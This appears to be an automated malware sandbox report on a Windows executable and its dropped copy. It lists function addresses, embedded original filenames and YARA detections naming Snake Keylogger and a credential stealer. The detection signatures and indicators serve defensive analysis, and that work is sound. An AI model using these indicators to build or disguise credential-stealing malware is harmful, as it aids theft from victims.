Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EEF99	0_2_075EEF99
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EEFA8	0_2_075EEFA8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EECB8	0_2_075EECB8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_075EBA00	0_2_075EBA00
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244D278	7_2_0244D278
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_02445362	7_2_02445362
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244C146	7_2_0244C146
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244C738	7_2_0244C738
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244C468	7_2_0244C468
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244CA08	7_2_0244CA08
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244E988	7_2_0244E988
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_024469A0	7_2_024469A0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_02446FC8	7_2_02446FC8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244CFA9	7_2_0244CFA9
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244CCD8	7_2_0244CCD8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_02449DE0	7_2_02449DE0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244F631	7_2_0244F631
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244FA88	7_2_0244FA88
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244E97A	7_2_0244E97A
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_024429E0	7_2_024429E0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_02443E09	7_2_02443E09
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06401E80	7_2_06401E80
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_064017A0	7_2_064017A0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06409C70	7_2_06409C70
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06409548	7_2_06409548
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06400B30	7_2_06400B30
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06405028	7_2_06405028
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06402968	7_2_06402968
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06401E70	7_2_06401E70
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640DE00	7_2_0640DE00
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640E6AF	7_2_0640E6AF
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640E6B0	7_2_0640E6B0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640EF51	7_2_0640EF51
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640EF60	7_2_0640EF60
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640178F	7_2_0640178F
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06409C6D	7_2_06409C6D
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640CCA0	7_2_0640CCA0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640D540	7_2_0640D540
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640D550	7_2_0640D550
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640DDFF	7_2_0640DDFF
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640E24A	7_2_0640E24A
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640E258	7_2_0640E258
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640EAF8	7_2_0640EAF8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640EB08	7_2_0640EB08
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06400B20	7_2_06400B20
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06409328	7_2_06409328
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06408B90	7_2_06408B90
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06408BA0	7_2_06408BA0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640F3B8	7_2_0640F3B8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06400040	7_2_06400040
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640F802	7_2_0640F802
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640F810	7_2_0640F810
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06405018	7_2_06405018
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640003F	7_2_0640003F
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640D0F8	7_2_0640D0F8
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640D999	7_2_0640D999
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0640D9A8	7_2_0640D9A8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_00B9DC5C	8_2_00B9DC5C
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_028072C0	8_2_028072C0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_028002C9	8_2_028002C9
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_028002D8	8_2_028002D8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_0280EB05	8_2_0280EB05
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_028072B3	8_2_028072B3
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_02809237	8_2_02809237
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A0CE98	8_2_06A0CE98
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A08700	8_2_06A08700
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A07518	8_2_06A07518
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A082C8	8_2_06A082C8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A06110	8_2_06A06110
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A05CD8	8_2_06A05CD8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6A740	8_2_06C6A740
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6ECC8	8_2_06C6ECC8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6BA10	8_2_06C6BA10
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6A73C	8_2_06C6A73C
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6E050	8_2_06C6E050
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6EF99	8_2_06C6EF99
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6EFA8	8_2_06C6EFA8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6ECB8	8_2_06C6ECB8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06C6BA00	8_2_06C6BA00
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAD278	12_2_02BAD278
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BA5362	12_2_02BA5362
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAA088	12_2_02BAA088
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BA7118	12_2_02BA7118
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAC146	12_2_02BAC146
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAC738	12_2_02BAC738
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAC468	12_2_02BAC468
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAD548	12_2_02BAD548
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BACA08	12_2_02BACA08
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BA69B0	12_2_02BA69B0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAE988	12_2_02BAE988
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BACFAA	12_2_02BACFAA
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BACCD8	12_2_02BACCD8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAF631	12_2_02BAF631
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAFA88	12_2_02BAFA88
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BA29E0	12_2_02BA29E0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BAE97A	12_2_02BAE97A
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_02BA3E09	12_2_02BA3E09
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05879548	12_2_05879548
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05879C18	12_2_05879C18
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05875028	12_2_05875028
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587D999	12_2_0587D999
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587D9A8	12_2_0587D9A8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587DDF2	12_2_0587DDF2
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587D540	12_2_0587D540
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587D550	12_2_0587D550
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587295A	12_2_0587295A
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05872968	12_2_05872968
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587CC8F	12_2_0587CC8F
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587CCA0	12_2_0587CCA0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587D0F8	12_2_0587D0F8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05870007	12_2_05870007
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587F801	12_2_0587F801
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587F810	12_2_0587F810
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05875018	12_2_05875018
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05870040	12_2_05870040
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587178F	12_2_0587178F
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05878B90	12_2_05878B90
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_058717A0	12_2_058717A0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05878BA0	12_2_05878BA0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587F3A8	12_2_0587F3A8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587F3B8	12_2_0587F3B8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587EB08	12_2_0587EB08
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05870B20	12_2_05870B20
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05879328	12_2_05879328
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05870B30	12_2_05870B30
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587EF51	12_2_0587EF51
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587EF60	12_2_0587EF60
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05871E80	12_2_05871E80
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587E6AF	12_2_0587E6AF
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587E6B0	12_2_0587E6B0
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587EAF8	12_2_0587EAF8
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587DE00	12_2_0587DE00
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587E249	12_2_0587E249
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_0587E258	12_2_0587E258
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 12_2_05871E70	12_2_05871E70

Source: PvAmrCZENy.exe, 00000000.00000002.906373389.00000000032BC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.921506836.00000000075C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.900799923.000000000147E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.00000000041F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000000.876866707.0000000000EBC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamenqHL.exe4 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.919895324.000000000742A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.919895324.000000000742A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenqHL.exe4 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.905542517.0000000003120000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000000.00000002.909841529.000000000423B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000007.00000002.2129140223.00000000008F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe, 00000007.00000002.2128526264.0000000000443000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs PvAmrCZENy.exe
Source: PvAmrCZENy.exe	Binary or memory string: OriginalFilenamenqHL.exe4 vs PvAmrCZENy.exe

Source: PvAmrCZENy.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: PvAmrCZENy.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yxXYABHh.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
